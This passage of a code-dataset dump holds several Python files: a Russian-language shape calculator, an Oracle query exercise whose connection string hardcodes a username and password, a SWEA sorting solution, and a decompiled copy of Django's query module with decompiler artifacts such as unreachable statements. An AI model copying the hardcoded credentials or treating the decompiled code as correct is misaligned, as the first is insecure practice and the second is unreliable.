\")),\n float(input(\"2 катет = \")),\n float(input(\"3 катет = \"))\n )\n return triangle.get_perimeter()\n\n def rectangle_perimeter():\n \"\"\" квадрат - прямоугольник\n \"\"\"\n rectangl = CClass.Rectangle()\n rectangl.width = float(input(\"Ширина = \"))\n rectangl.height = float(input(\"Высота = \"))\n return rectangl.get_perimeter()\n functions = {\n 3: circle_perimeter,\n 2: rectangle_perimeter,\n 1: triangle_perimeter,\n 0: self.nazad,\n }\n prompt3 = \"Введите номер фигуры и нажмите ENTER:\\n\"\n for key, cmd in functions.items():\n prompt3 += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n print(prompt3)\n i = 1\n while i:\n i = int(input())\n result = functions.get(i, self.unknown_cmd)()\n print(\"периметр = \", result, \"\\n\")\n\n\n def square(self):\n \"\"\" найти площадь фигуры\n \"\"\"\n\n def circle_square():\n \"\"\" круг\n \"\"\"\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n return circle.get_square()\n\n def triangle_square():\n \"\"\" треугольник\n \"\"\"\n triangle = CClass.Triangle()\n triangle.katet = (float(input(\"1 катет = \")),\n 
float(input(\"2 катет = \")),\n float(input(\"3 катет = \"))\n )\n return triangle.get_square()\n\n def rectangle_square():\n \"\"\" квадрат - прямоугольник\n \"\"\"\n rectangl = CClass.Rectangle()\n rectangl.width = float(input(\"Ширина = \"))\n rectangl.height = float(input(\"Высота = \"))\n return rectangl.get_square()\n\n functions = {\n 3: circle_square,\n 2: rectangle_square,\n 1: triangle_square,\n 0: self.nazad,\n }\n prompt4 = \"Введите номер фигуры и нажмите ENTER:\\n\"\n for key, cmd in functions.items():\n prompt4 += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n print(prompt4)\n i = 1\n while i:\n i = int(input())\n result = functions.get(i, self.unknown_cmd)()\n print(\"площадь = \", result, \"\\n\")\n\n\ncommand = Command()\ncommand.run()","sub_path":"figures/One.py","file_name":"One.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299289448","text":"#dbparam\r\n#applying paramaeterised queries.\r\n\r\nimport cx_Oracle\r\ncon=cx_Oracle.connect(\"sriram/mymouse#1@localhost/orcl\")\r\ncur=con.cursor()\r\ncur.prepare(\"select * from products where pid=:1\")\r\na=True\r\nwhile a:\r\n if a:\r\n pid=int(input(\"Enter a product Id\"))\r\n cur.execute(None,{'1':pid})\r\n data=cur.fetchall()\r\n print(len(data),\" Rows\")\r\n for k in data:\r\n print(k)\r\n\r\n b=input(\"Continue\")\r\n print(b,a)\r\n if b !=a:\r\n cur.close()\r\n con.close()\r\n break\r\n else:\r\n continue\r\n","sub_path":"Python Exercises/dbparam.py","file_name":"dbparam.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410816249","text":"# [S/W 문제해결 기본] 5일차 - GNS\n\n# import sys\n# sys.stdin = open(\"GNS_test_input.txt\", 'r')\n\nsdict = {\"ZRO\": 0, \"ONE\": 1, \"TWO\": 2, \"THR\": 3, \"FOR\": 4,\n \"FIV\": 5, \"SIX\": 6, \"SVN\": 7, \"EGT\": 8, \"NIN\": 9}\n\nT = int(input())\nfor tc in range(1, T+1):\n tc_num, n = input().split()\n s = list(input().split())\n\n for i in range(len(s)-1, 0, -1):\n for j in range(i):\n if sdict[s[j]] > sdict[s[j+1]]:\n s[j], s[j+1] = s[j+1], s[j]\n\n print('#', tc, sep='')\n print(' '.join(s))","sub_path":"inSSAFY/SWEA/D3/GNS.py","file_name":"GNS.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47736573","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-n_sfyb/Django/django/db/models/sql/query.py\n# Compiled at: 2019-02-14 00:35:17\n\"\"\"\nCreate SQL statements for QuerySets.\n\nThe code in here encapsulates all of the SQL construction so that QuerySets\nthemselves do not have to (and could be backed by things other than SQL\ndatabases). 
The abstraction barrier only works one way: this module has to know\nall about the internals of models in order to get the information it needs.\n\"\"\"\nimport copy, warnings\nfrom collections import Counter, Iterator, Mapping, OrderedDict\nfrom itertools import chain, count, product\nfrom string import ascii_uppercase\nfrom django.core.exceptions import FieldDoesNotExist, FieldError\nfrom django.db import DEFAULT_DB_ALIAS, connections\nfrom django.db.models.aggregates import Count\nfrom django.db.models.constants import LOOKUP_SEP\nfrom django.db.models.expressions import Col, Ref\nfrom django.db.models.fields.related_lookups import MultiColSource\nfrom django.db.models.lookups import Lookup\nfrom django.db.models.query_utils import Q, check_rel_lookup_compatibility, refs_expression\nfrom django.db.models.sql.constants import INNER, LOUTER, ORDER_DIR, ORDER_PATTERN, QUERY_TERMS, SINGLE\nfrom django.db.models.sql.datastructures import BaseTable, Empty, EmptyResultSet, Join, MultiJoin\nfrom django.db.models.sql.where import AND, OR, ExtraWhere, NothingNode, WhereNode\nfrom django.utils import six\nfrom django.utils.deprecation import RemovedInDjango20Warning\nfrom django.utils.encoding import force_text\nfrom django.utils.tree import Node\n__all__ = [\n 'Query', 'RawQuery']\n\ndef get_field_names_from_opts(opts):\n return set(chain.from_iterable(((f.name, f.attname) if f.concrete else (f.name,)) for f in opts.get_fields()))\n\n\nclass RawQuery(object):\n \"\"\"\n A single raw SQL query\n \"\"\"\n\n def __init__(self, sql, using, params=None, context=None):\n self.params = params or ()\n self.sql = sql\n self.using = using\n self.cursor = None\n self.low_mark, self.high_mark = (0, None)\n self.extra_select = {}\n self.annotation_select = {}\n self.context = context or {}\n return\n\n def clone(self, using):\n return RawQuery(self.sql, using, params=self.params, context=self.context.copy())\n\n def get_columns(self):\n if self.cursor is None:\n self._execute_query()\n converter = connections[self.using].introspection.column_name_converter\n return [ converter(column_meta[0]) for column_meta in self.cursor.description\n ]\n\n def __iter__(self):\n self._execute_query()\n if not connections[self.using].features.can_use_chunked_reads:\n result = list(self.cursor)\n else:\n result = self.cursor\n return iter(result)\n\n def __repr__(self):\n return '<%s: %s>' % (self.__class__.__name__, self)\n\n @property\n def params_type(self):\n if isinstance(self.params, Mapping):\n return dict\n return tuple\n\n def __str__(self):\n return self.sql % self.params_type(self.params)\n\n def _execute_query(self):\n connection = connections[self.using]\n params_type = self.params_type\n adapter = connection.ops.adapt_unknown_value\n if params_type is tuple:\n params = tuple(adapter(val) for val in self.params)\n elif params_type is dict:\n params = dict((key, adapter(val)) for key, val in six.iteritems(self.params))\n else:\n raise RuntimeError('Unexpected params type: %s' % params_type)\n self.cursor = connection.cursor()\n self.cursor.execute(self.sql, params)\n\n\nclass Query(object):\n \"\"\"\n A single SQL query.\n \"\"\"\n alias_prefix = 'T'\n subq_aliases = frozenset([alias_prefix])\n query_terms = QUERY_TERMS\n compiler = 'SQLCompiler'\n\n def __init__(self, model, where=WhereNode):\n self.model = model\n self.alias_refcount = {}\n self.alias_map = OrderedDict()\n self.external_aliases = set()\n self.table_map = {}\n self.default_cols = True\n self.default_ordering = True\n self.standard_ordering = 
True\n self.used_aliases = set()\n self.filter_is_sticky = False\n self.subquery = False\n self.select = []\n self.tables = []\n self.where = where()\n self.where_class = where\n self.group_by = None\n self.order_by = []\n self.low_mark, self.high_mark = (0, None)\n self.distinct = False\n self.distinct_fields = []\n self.select_for_update = False\n self.select_for_update_nowait = False\n self.select_for_update_skip_locked = False\n self.select_related = False\n self.max_depth = 5\n self.values_select = []\n self._annotations = None\n self.annotation_select_mask = None\n self._annotation_select_cache = None\n self.combinator = None\n self.combinator_all = False\n self.combined_queries = ()\n self._extra = None\n self.extra_select_mask = None\n self._extra_select_cache = None\n self.extra_tables = ()\n self.extra_order_by = ()\n self.deferred_loading = (\n set(), True)\n self.context = {}\n return\n\n @property\n def extra(self):\n if self._extra is None:\n self._extra = OrderedDict()\n return self._extra\n\n @property\n def annotations(self):\n if self._annotations is None:\n self._annotations = OrderedDict()\n return self._annotations\n\n def __str__(self):\n \"\"\"\n Returns the query as a string of SQL with the parameter values\n substituted in (use sql_with_params() to see the unsubstituted string).\n\n Parameter values won't necessarily be quoted correctly, since that is\n done by the database interface at execution time.\n \"\"\"\n sql, params = self.sql_with_params()\n return sql % params\n\n def sql_with_params(self):\n \"\"\"\n Returns the query as an SQL string and the parameters that will be\n substituted into the query.\n \"\"\"\n return self.get_compiler(DEFAULT_DB_ALIAS).as_sql()\n\n def __deepcopy__(self, memo):\n result = self.clone(memo=memo)\n memo[id(self)] = result\n return result\n\n def _prepare(self, field):\n return self\n\n def get_compiler(self, using=None, connection=None):\n if using is None and connection is None:\n raise ValueError('Need either using or connection')\n if using:\n connection = connections[using]\n return connection.ops.compiler(self.compiler)(self, connection, using)\n\n def get_meta(self):\n \"\"\"\n Returns the Options instance (the model._meta) from which to start\n processing. Normally, this is self.model._meta, but it can be changed\n by subclasses.\n \"\"\"\n return self.model._meta\n\n def clone(self, klass=None, memo=None, **kwargs):\n \"\"\"\n Creates a copy of the current instance. 
The 'kwargs' parameter can be\n used by clients to update attributes after copying has taken place.\n \"\"\"\n obj = Empty()\n obj.__class__ = klass or self.__class__\n obj.model = self.model\n obj.alias_refcount = self.alias_refcount.copy()\n obj.alias_map = self.alias_map.copy()\n obj.external_aliases = self.external_aliases.copy()\n obj.table_map = self.table_map.copy()\n obj.default_cols = self.default_cols\n obj.default_ordering = self.default_ordering\n obj.standard_ordering = self.standard_ordering\n obj.select = self.select[:]\n obj.tables = self.tables[:]\n obj.where = self.where.clone()\n obj.where_class = self.where_class\n if self.group_by is None:\n obj.group_by = None\n elif self.group_by is True:\n obj.group_by = True\n else:\n obj.group_by = self.group_by[:]\n obj.order_by = self.order_by[:]\n obj.low_mark, obj.high_mark = self.low_mark, self.high_mark\n obj.distinct = self.distinct\n obj.distinct_fields = self.distinct_fields[:]\n obj.select_for_update = self.select_for_update\n obj.select_for_update_nowait = self.select_for_update_nowait\n obj.select_for_update_skip_locked = self.select_for_update_skip_locked\n obj.select_related = self.select_related\n obj.values_select = self.values_select[:]\n obj._annotations = self._annotations.copy() if self._annotations is not None else None\n if self.annotation_select_mask is None:\n obj.annotation_select_mask = None\n else:\n obj.annotation_select_mask = self.annotation_select_mask.copy()\n obj._annotation_select_cache = None\n obj.max_depth = self.max_depth\n obj.combinator = self.combinator\n obj.combinator_all = self.combinator_all\n obj.combined_queries = self.combined_queries\n obj._extra = self._extra.copy() if self._extra is not None else None\n if self.extra_select_mask is None:\n obj.extra_select_mask = None\n else:\n obj.extra_select_mask = self.extra_select_mask.copy()\n if self._extra_select_cache is None:\n obj._extra_select_cache = None\n else:\n obj._extra_select_cache = self._extra_select_cache.copy()\n obj.extra_tables = self.extra_tables\n obj.extra_order_by = self.extra_order_by\n obj.deferred_loading = (copy.copy(self.deferred_loading[0]), self.deferred_loading[1])\n if self.filter_is_sticky and self.used_aliases:\n obj.used_aliases = self.used_aliases.copy()\n else:\n obj.used_aliases = set()\n obj.filter_is_sticky = False\n obj.subquery = self.subquery\n if 'alias_prefix' in self.__dict__:\n obj.alias_prefix = self.alias_prefix\n if 'subq_aliases' in self.__dict__:\n obj.subq_aliases = self.subq_aliases.copy()\n obj.__dict__.update(kwargs)\n if hasattr(obj, '_setup_query'):\n obj._setup_query()\n obj.context = self.context.copy()\n obj._forced_pk = getattr(self, '_forced_pk', False)\n return obj\n\n def add_context(self, key, value):\n self.context[key] = value\n\n def get_context(self, key, default=None):\n return self.context.get(key, default)\n\n def relabeled_clone(self, change_map):\n clone = self.clone()\n clone.change_aliases(change_map)\n return clone\n\n def rewrite_cols(self, annotation, col_cnt):\n orig_exprs = annotation.get_source_expressions()\n new_exprs = []\n for expr in orig_exprs:\n if isinstance(expr, Ref):\n new_exprs.append(expr)\n elif isinstance(expr, (WhereNode, Lookup)):\n new_expr, col_cnt = self.rewrite_cols(expr, col_cnt)\n new_exprs.append(new_expr)\n elif isinstance(expr, Col) or expr.contains_aggregate and not expr.is_summary:\n col_cnt += 1\n col_alias = '__col%d' % col_cnt\n self.annotations[col_alias] = expr\n self.append_annotation_mask([col_alias])\n 
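# Substitute a Ref to the hoisted '__colN' annotation for the original expression,\n                # so the enclosing aggregate query can select it by alias.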
new_exprs.append(Ref(col_alias, expr))\n else:\n new_expr, col_cnt = self.rewrite_cols(expr, col_cnt)\n new_exprs.append(new_expr)\n\n annotation.set_source_expressions(new_exprs)\n return (annotation, col_cnt)\n\n def get_aggregation(self, using, added_aggregate_names):\n \"\"\"\n Returns the dictionary with the values of the existing aggregations.\n \"\"\"\n if not self.annotation_select:\n return {}\n else:\n has_limit = self.low_mark != 0 or self.high_mark is not None\n has_existing_annotations = any(annotation for alias, annotation in self.annotations.items() if alias not in added_aggregate_names)\n if isinstance(self.group_by, list) or has_limit or has_existing_annotations or self.distinct or self.combinator:\n from django.db.models.sql.subqueries import AggregateQuery\n outer_query = AggregateQuery(self.model)\n inner_query = self.clone()\n inner_query.select_for_update = False\n inner_query.select_related = False\n if not has_limit and not self.distinct_fields:\n inner_query.clear_ordering(True)\n if not inner_query.distinct:\n if inner_query.default_cols and has_existing_annotations:\n inner_query.group_by = [\n self.model._meta.pk.get_col(inner_query.get_initial_alias())]\n inner_query.default_cols = False\n relabels = {t:'subquery' for t in inner_query.tables}\n relabels[None] = 'subquery'\n col_cnt = 0\n for alias, expression in list(inner_query.annotation_select.items()):\n if expression.is_summary:\n expression, col_cnt = inner_query.rewrite_cols(expression, col_cnt)\n outer_query.annotations[alias] = expression.relabeled_clone(relabels)\n del inner_query.annotations[alias]\n inner_query.set_annotation_mask(inner_query.annotation_select_mask)\n\n if inner_query.select == [] and not inner_query.default_cols and not inner_query.annotation_select_mask:\n inner_query.select = [\n self.model._meta.pk.get_col(inner_query.get_initial_alias())]\n try:\n outer_query.add_subquery(inner_query, using)\n except EmptyResultSet:\n return {alias:None for alias in outer_query.annotation_select}\n\n else:\n outer_query = self\n self.select = []\n self.default_cols = False\n self._extra = {}\n outer_query.clear_ordering(True)\n outer_query.clear_limits()\n outer_query.select_for_update = False\n outer_query.select_related = False\n compiler = outer_query.get_compiler(using)\n result = compiler.execute_sql(SINGLE)\n if result is None:\n result = [ None for q in outer_query.annotation_select.items() ]\n converters = compiler.get_converters(outer_query.annotation_select.values())\n result = compiler.apply_converters(result, converters)\n return {alias:val for (alias, annotation), val in zip(outer_query.annotation_select.items(), result)}\n\n def get_count(self, using):\n \"\"\"\n Performs a COUNT() query using the current filter constraints.\n \"\"\"\n obj = self.clone()\n obj.add_annotation(Count('*'), alias='__count', is_summary=True)\n number = obj.get_aggregation(using, ['__count'])['__count']\n if number is None:\n number = 0\n return number\n\n def has_filters(self):\n return self.where\n\n def has_results(self, using):\n q = self.clone()\n if not q.distinct:\n if q.group_by is True:\n q.add_fields((f.attname for f in self.model._meta.concrete_fields), False)\n q.set_group_by()\n q.clear_select_clause()\n q.clear_ordering(True)\n q.set_limits(high=1)\n compiler = q.get_compiler(using=using)\n return compiler.has_results()\n\n def combine(self, rhs, connector):\n \"\"\"\n Merge the 'rhs' query into the current one (with any 'rhs' effects\n being applied *after* (that is, \"to the right of\") 
anything in the\n current query. 'rhs' is not modified during a call to this function.\n\n The 'connector' parameter describes how to connect filters from the\n 'rhs' query.\n \"\"\"\n if not self.model == rhs.model:\n raise AssertionError('Cannot combine queries on two different base models.')\n assert self.can_filter(), 'Cannot combine queries once a slice has been taken.'\n assert self.distinct == rhs.distinct, 'Cannot combine a unique query with a non-unique query.'\n assert self.distinct_fields == rhs.distinct_fields, 'Cannot combine queries with different distinct fields.'\n change_map = {}\n conjunction = connector == AND\n reuse = set() if conjunction else set(self.tables)\n self.get_initial_alias()\n joinpromoter = JoinPromoter(connector, 2, False)\n joinpromoter.add_votes(j for j in self.alias_map if self.alias_map[j].join_type == INNER)\n rhs_votes = set()\n for alias in rhs.tables[1:]:\n join = rhs.alias_map[alias]\n join = join.relabeled_clone(change_map)\n new_alias = self.join(join, reuse=reuse)\n if join.join_type == INNER:\n rhs_votes.add(new_alias)\n reuse.discard(new_alias)\n if alias != new_alias:\n change_map[alias] = new_alias\n if not rhs.alias_refcount[alias]:\n self.unref_alias(new_alias)\n\n joinpromoter.add_votes(rhs_votes)\n joinpromoter.update_join_types(self)\n w = rhs.where.clone()\n w.relabel_aliases(change_map)\n self.where.add(w, connector)\n self.select = []\n for col in rhs.select:\n self.add_select(col.relabeled_clone(change_map))\n\n if connector == OR and self._extra and rhs._extra:\n raise ValueError(\"When merging querysets using 'or', you cannot have extra(select=...) on both sides.\")\n self.extra.update(rhs.extra)\n extra_select_mask = set()\n if self.extra_select_mask is not None:\n extra_select_mask.update(self.extra_select_mask)\n if rhs.extra_select_mask is not None:\n extra_select_mask.update(rhs.extra_select_mask)\n if extra_select_mask:\n self.set_extra_mask(extra_select_mask)\n self.extra_tables += rhs.extra_tables\n self.order_by = rhs.order_by[:] if rhs.order_by else self.order_by\n self.extra_order_by = rhs.extra_order_by or self.extra_order_by\n return\n\n def deferred_to_data(self, target, callback):\n \"\"\"\n Converts the self.deferred_loading data structure to an alternate data\n structure, describing the field that *will* be loaded. This is used to\n compute the columns to select from the database and also by the\n QuerySet class to work out which fields are being initialized on each\n model. Models that have all their fields included aren't mentioned in\n the result, only those that have field restrictions in place.\n\n The \"target\" parameter is the instance that is populated (in place).\n The \"callback\" is a function that is called whenever a (model, field)\n pair need to be added to \"target\". 
It accepts three parameters:\n \"target\", and the model and list of fields being added for that model.\n \"\"\"\n field_names, defer = self.deferred_loading\n if not field_names:\n return\n orig_opts = self.get_meta()\n seen = {}\n must_include = {orig_opts.concrete_model: {orig_opts.pk}}\n for field_name in field_names:\n parts = field_name.split(LOOKUP_SEP)\n cur_model = self.model._meta.concrete_model\n opts = orig_opts\n for name in parts[:-1]:\n old_model = cur_model\n source = opts.get_field(name)\n if is_reverse_o2o(source):\n cur_model = source.related_model\n else:\n cur_model = source.remote_field.model\n opts = cur_model._meta\n if not is_reverse_o2o(source):\n must_include[old_model].add(source)\n add_to_dict(must_include, cur_model, opts.pk)\n\n field = opts.get_field(parts[(-1)])\n is_reverse_object = field.auto_created and not field.concrete\n model = field.related_model if is_reverse_object else field.model\n model = model._meta.concrete_model\n if model == opts.model:\n model = cur_model\n if not is_reverse_o2o(field):\n add_to_dict(seen, model, field)\n\n if defer:\n workset = {}\n for model, values in six.iteritems(seen):\n for field in model._meta.fields:\n if field in values:\n continue\n m = field.model._meta.concrete_model\n add_to_dict(workset, m, field)\n\n for model, values in six.iteritems(must_include):\n if model in workset:\n workset[model].update(values)\n\n for model, values in six.iteritems(workset):\n callback(target, model, values)\n\n else:\n for model, values in six.iteritems(must_include):\n if model in seen:\n seen[model].update(values)\n else:\n seen[model] = values\n\n for model in orig_opts.get_parent_list():\n if model not in seen:\n seen[model] = set()\n\n for model, values in six.iteritems(seen):\n callback(target, model, values)\n\n def table_alias(self, table_name, create=False):\n \"\"\"\n Returns a table alias for the given table_name and whether this is a\n new alias or not.\n\n If 'create' is true, a new alias is always created. Otherwise, the\n most recently created alias for the table (if one exists) is reused.\n \"\"\"\n alias_list = self.table_map.get(table_name)\n if not create and alias_list:\n alias = alias_list[0]\n self.alias_refcount[alias] += 1\n return (\n alias, False)\n if alias_list:\n alias = '%s%d' % (self.alias_prefix, len(self.alias_map) + 1)\n alias_list.append(alias)\n else:\n alias = table_name\n self.table_map[alias] = [alias]\n self.alias_refcount[alias] = 1\n self.tables.append(alias)\n return (alias, True)\n\n def ref_alias(self, alias):\n \"\"\" Increases the reference count for this alias. \"\"\"\n self.alias_refcount[alias] += 1\n\n def unref_alias(self, alias, amount=1):\n \"\"\" Decreases the reference count for this alias. \"\"\"\n self.alias_refcount[alias] -= amount\n\n def promote_joins(self, aliases):\n \"\"\"\n Promotes recursively the join type of given aliases and its children to\n an outer join. If 'unconditional' is False, the join is only promoted if\n it is nullable or the parent join is an outer join.\n\n The children promotion is done to avoid join chains that contain a LOUTER\n b INNER c. 
So, if we have currently a INNER b INNER c and a->b is promoted,\n then we must also promote b->c automatically, or otherwise the promotion\n of a->b doesn't actually change anything in the query results.\n \"\"\"\n aliases = list(aliases)\n while aliases:\n alias = aliases.pop(0)\n if self.alias_map[alias].join_type is None:\n continue\n assert self.alias_map[alias].join_type is not None\n parent_alias = self.alias_map[alias].parent_alias\n parent_louter = parent_alias and self.alias_map[parent_alias].join_type == LOUTER\n already_louter = self.alias_map[alias].join_type == LOUTER\n if (self.alias_map[alias].nullable or parent_louter) and not already_louter:\n self.alias_map[alias] = self.alias_map[alias].promote()\n aliases.extend(join for join in self.alias_map.keys() if self.alias_map[join].parent_alias == alias and join not in aliases)\n\n return\n\n def demote_joins(self, aliases):\n \"\"\"\n Change join type from LOUTER to INNER for all joins in aliases.\n\n Similarly to promote_joins(), this method must ensure no join chains\n containing first an outer, then an inner join are generated. If we\n are demoting b->c join in chain a LOUTER b LOUTER c then we must\n demote a->b automatically, or otherwise the demotion of b->c doesn't\n actually change anything in the query results. .\n \"\"\"\n aliases = list(aliases)\n while aliases:\n alias = aliases.pop(0)\n if self.alias_map[alias].join_type == LOUTER:\n self.alias_map[alias] = self.alias_map[alias].demote()\n parent_alias = self.alias_map[alias].parent_alias\n if self.alias_map[parent_alias].join_type == INNER:\n aliases.append(parent_alias)\n\n def reset_refcounts(self, to_counts):\n \"\"\"\n This method will reset reference counts for aliases so that they match\n the value passed in :param to_counts:.\n \"\"\"\n for alias, cur_refcount in self.alias_refcount.copy().items():\n unref_amount = cur_refcount - to_counts.get(alias, 0)\n self.unref_alias(alias, unref_amount)\n\n def change_aliases(self, change_map):\n \"\"\"\n Changes the aliases in change_map (which maps old-alias -> new-alias),\n relabelling any references to them in select columns and the where\n clause.\n \"\"\"\n assert set(change_map.keys()).intersection(set(change_map.values())) == set()\n self.where.relabel_aliases(change_map)\n if isinstance(self.group_by, list):\n self.group_by = [ col.relabeled_clone(change_map) for col in self.group_by ]\n self.select = [ col.relabeled_clone(change_map) for col in self.select ]\n if self._annotations:\n self._annotations = OrderedDict((key, col.relabeled_clone(change_map)) for key, col in self._annotations.items())\n for old_alias, new_alias in six.iteritems(change_map):\n if old_alias not in self.alias_map:\n continue\n alias_data = self.alias_map[old_alias].relabeled_clone(change_map)\n self.alias_map[new_alias] = alias_data\n self.alias_refcount[new_alias] = self.alias_refcount[old_alias]\n del self.alias_refcount[old_alias]\n del self.alias_map[old_alias]\n table_aliases = self.table_map[alias_data.table_name]\n for pos, alias in enumerate(table_aliases):\n if alias == old_alias:\n table_aliases[pos] = new_alias\n break\n\n self.external_aliases = {change_map.get(alias, alias) for alias in self.external_aliases}\n\n def bump_prefix(self, outer_query):\n \"\"\"\n Changes the alias prefix to the next letter in the alphabet in a way\n that the outer query's aliases and this query's aliases will not\n conflict. 
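The cascade promote_joins describes can be demonstrated with a toy worklist; the joins mapping below is a made-up stand-in for the query's alias_map, not Django API.

LOUTER, INNER = "LOUTER", "INNER"
joins = {
    "b": {"parent": "a", "type": INNER, "nullable": True},
    "c": {"parent": "b", "type": INNER, "nullable": True},
}

def promote(aliases):
    work = list(aliases)
    while work:
        alias = work.pop(0)
        join = joins[alias]
        parent_louter = join["parent"] in joins and joins[join["parent"]]["type"] == LOUTER
        if (join["nullable"] or parent_louter) and join["type"] != LOUTER:
            join["type"] = LOUTER
            # A newly promoted join may force its children to follow.
            work.extend(a for a, j in joins.items() if j["parent"] == alias)

promote(["b"])
assert joins["c"]["type"] == LOUTER  # b's promotion cascaded to c, as described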
Even tables that previously had no alias will get an alias\n after this call.\n \"\"\"\n\n def prefix_gen():\n \"\"\"\n Generates a sequence of characters in alphabetical order:\n -> 'A', 'B', 'C', ...\n\n When the alphabet is finished, the sequence will continue with the\n Cartesian product:\n -> 'AA', 'AB', 'AC', ...\n \"\"\"\n alphabet = ascii_uppercase\n prefix = chr(ord(self.alias_prefix) + 1)\n yield prefix\n for n in count(1):\n seq = alphabet[alphabet.index(prefix):] if prefix else alphabet\n for s in product(seq, repeat=n):\n yield ('').join(s)\n\n prefix = None\n\n return\n\n if self.alias_prefix != outer_query.alias_prefix:\n return\n local_recursion_limit = 127\n for pos, prefix in enumerate(prefix_gen()):\n if prefix not in self.subq_aliases:\n self.alias_prefix = prefix\n break\n if pos > local_recursion_limit:\n raise RuntimeError('Maximum recursion depth exceeded: too many subqueries.')\n\n self.subq_aliases = self.subq_aliases.union([self.alias_prefix])\n outer_query.subq_aliases = outer_query.subq_aliases.union(self.subq_aliases)\n change_map = OrderedDict()\n for pos, alias in enumerate(self.tables):\n new_alias = '%s%d' % (self.alias_prefix, pos)\n change_map[alias] = new_alias\n self.tables[pos] = new_alias\n\n self.change_aliases(change_map)\n\n def get_initial_alias(self):\n \"\"\"\n Returns the first alias for this query, after increasing its reference\n count.\n \"\"\"\n if self.tables:\n alias = self.tables[0]\n self.ref_alias(alias)\n else:\n alias = self.join(BaseTable(self.get_meta().db_table, None))\n return alias\n\n def count_active_tables(self):\n \"\"\"\n Returns the number of tables in this query with a non-zero reference\n count. Note that after execution, the reference counts are zeroed, so\n tables added in compiler will not be seen by this method.\n \"\"\"\n return len([ 1 for count in self.alias_refcount.values() if count ])\n\n def join(self, join, reuse=None):\n \"\"\"\n Return an alias for the 'join', either reusing an existing alias for\n that join or creating a new one. 'join' is either a\n sql.datastructures.BaseTable or Join.\n\n The 'reuse' parameter can be either None which means all joins are\n reusable, or it can be a set containing the aliases that can be reused.\n\n A join is always created as LOUTER if the lhs alias is LOUTER to make\n sure chains like t1 LOUTER t2 INNER t3 aren't generated. All new\n joins are created as LOUTER if the join is nullable.\n \"\"\"\n reuse = [ a for a, j in self.alias_map.items() if (reuse is None or a in reuse) and j == join\n ]\n if reuse:\n self.ref_alias(reuse[0])\n return reuse[0]\n else:\n alias, _ = self.table_alias(join.table_name, create=True)\n if join.join_type:\n if self.alias_map[join.parent_alias].join_type == LOUTER or join.nullable:\n join_type = LOUTER\n else:\n join_type = INNER\n join.join_type = join_type\n join.table_alias = alias\n self.alias_map[alias] = join\n return alias\n\n def join_parent_model(self, opts, model, alias, seen):\n \"\"\"\n Makes sure the given 'model' is joined in the query. If 'model' isn't\n a parent of 'opts' or if it is None this method is a no-op.\n\n The 'alias' is the root alias for starting the join, 'seen' is a dict\n of model -> alias of existing joins. It must also contain a mapping\n of None -> some alias. 
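The nested prefix_gen above carries visible decompiler damage (statements after its return are unreachable), but the sequence its docstring promises, 'A', 'B', ..., 'Z', then 'AA', 'AB', ..., is just a cartesian product. A standalone reconstruction of that documented behaviour only; the real method additionally starts after the current alias_prefix and skips prefixes already claimed by subqueries.

from itertools import count, product
from string import ascii_uppercase

def alias_prefixes():
    # One string per cartesian product: 'A'..'Z', then 'AA', 'AB', ...
    for n in count(1):
        for letters in product(ascii_uppercase, repeat=n):
            yield "".join(letters)

gen = alias_prefixes()
assert next(gen) == "A"
assert [next(gen) for _ in range(26)][-1] == "AA"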
This will be returned in the no-op case.\n \"\"\"\n if model in seen:\n return seen[model]\n else:\n chain = opts.get_base_chain(model)\n if not chain:\n return alias\n curr_opts = opts\n for int_model in chain:\n if int_model in seen:\n curr_opts = int_model._meta\n alias = seen[int_model]\n continue\n if not curr_opts.parents[int_model]:\n curr_opts = int_model._meta\n continue\n link_field = curr_opts.get_ancestor_link(int_model)\n _, _, _, joins, _ = self.setup_joins([\n link_field.name], curr_opts, alias)\n curr_opts = int_model._meta\n alias = seen[int_model] = joins[(-1)]\n\n return alias or seen[None]\n\n def add_annotation(self, annotation, alias, is_summary=False):\n \"\"\"\n Adds a single annotation expression to the Query\n \"\"\"\n annotation = annotation.resolve_expression(self, allow_joins=True, reuse=None, summarize=is_summary)\n self.append_annotation_mask([alias])\n self.annotations[alias] = annotation\n return\n\n def _prepare_as_filter_value(self):\n return self.clone()\n\n def prepare_lookup_value(self, value, lookups, can_reuse, allow_joins=True):\n used_joins = []\n if len(lookups) == 0:\n lookups = [\n 'exact']\n if value is None:\n if lookups[(-1)] not in ('exact', 'iexact'):\n raise ValueError('Cannot use None as a query value')\n return (True, ['isnull'], used_joins)\n else:\n if hasattr(value, 'resolve_expression'):\n pre_joins = self.alias_refcount.copy()\n value = value.resolve_expression(self, reuse=can_reuse, allow_joins=allow_joins)\n used_joins = [ k for k, v in self.alias_refcount.items() if v > pre_joins.get(k, 0) ]\n elif isinstance(value, (list, tuple)):\n processed_values = []\n used_joins = set()\n for sub_value in value:\n if hasattr(sub_value, 'resolve_expression'):\n pre_joins = self.alias_refcount.copy()\n processed_values.append(sub_value.resolve_expression(self, reuse=can_reuse, allow_joins=allow_joins))\n used_joins |= set(k for k, v in self.alias_refcount.items() if v > pre_joins.get(k, 0))\n\n if hasattr(value, '_prepare_as_filter_value'):\n value = value._prepare_as_filter_value()\n value.bump_prefix(self)\n if connections[DEFAULT_DB_ALIAS].features.interprets_empty_strings_as_nulls and lookups[(-1)] == 'exact' and value == '':\n value = True\n lookups[-1] = 'isnull'\n return (\n value, lookups, used_joins)\n\n def solve_lookup_type(self, lookup):\n \"\"\"\n Solve the lookup type from the lookup (eg: 'foobar__id__icontains')\n \"\"\"\n lookup_splitted = lookup.split(LOOKUP_SEP)\n if self._annotations:\n expression, expression_lookups = refs_expression(lookup_splitted, self.annotations)\n if expression:\n return (expression_lookups, (), expression)\n _, field, _, lookup_parts = self.names_to_path(lookup_splitted, self.get_meta())\n field_parts = lookup_splitted[0:len(lookup_splitted) - len(lookup_parts)]\n if len(lookup_parts) == 0:\n 